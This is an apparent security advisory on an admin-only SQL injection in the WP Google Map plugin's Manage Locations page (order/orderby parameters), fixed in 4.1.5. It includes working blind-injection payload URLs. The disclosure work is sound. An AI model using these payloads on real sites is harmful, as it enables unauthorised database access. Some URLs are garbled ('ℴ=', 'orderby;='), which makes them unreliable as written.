The Manage Locations page within the plugin settings was vulnerable to SQL Injection through a high privileged user (admin+). Edit (WPScanTeam): September 8th, 2020 - Confirmed & Escalated to WP plugins team September 8th, 2020 - WP plugins team investigating November 25th, 2020 - No updates, disclosing December 8th, 2020 - v4.1.4 released, issue still present (improper fix) January 27th, 2021 - v4.1.5 released, fixing the issue
- Vulnerable parameters: order
and orderby
1. Add at least two locations (via /wp-admin/admin.php?page=wpgmp_form_location) and execute sleep query: https://example.com/wp-admin/admin.php?page=wpgmp_manage_locationℴ=desc&orderby;=(sleep(5)) 2. The request will be delayed by 10 seconds. -– Parameter: #1* (URI) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: https://example.com/wp-admin/admin.php?page=wpgmp_manage_locationℴ=asc&orderby;=(SELECT (CASE WHEN (2605=2605) THEN ‘’ ELSE (SELECT 3517 UNION SELECT 5558) END)) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: https://example.com/wp-admin/admin.php?page=wpgmp_manage_locationℴ=asc&orderby;=(CASE WHEN (6922=6922) THEN SLEEP(5) ELSE 6922 END) -–
CPE | Name | Operator | Version |
---|---|---|---|
wp-google-map-plugin | lt | 4.1.5 |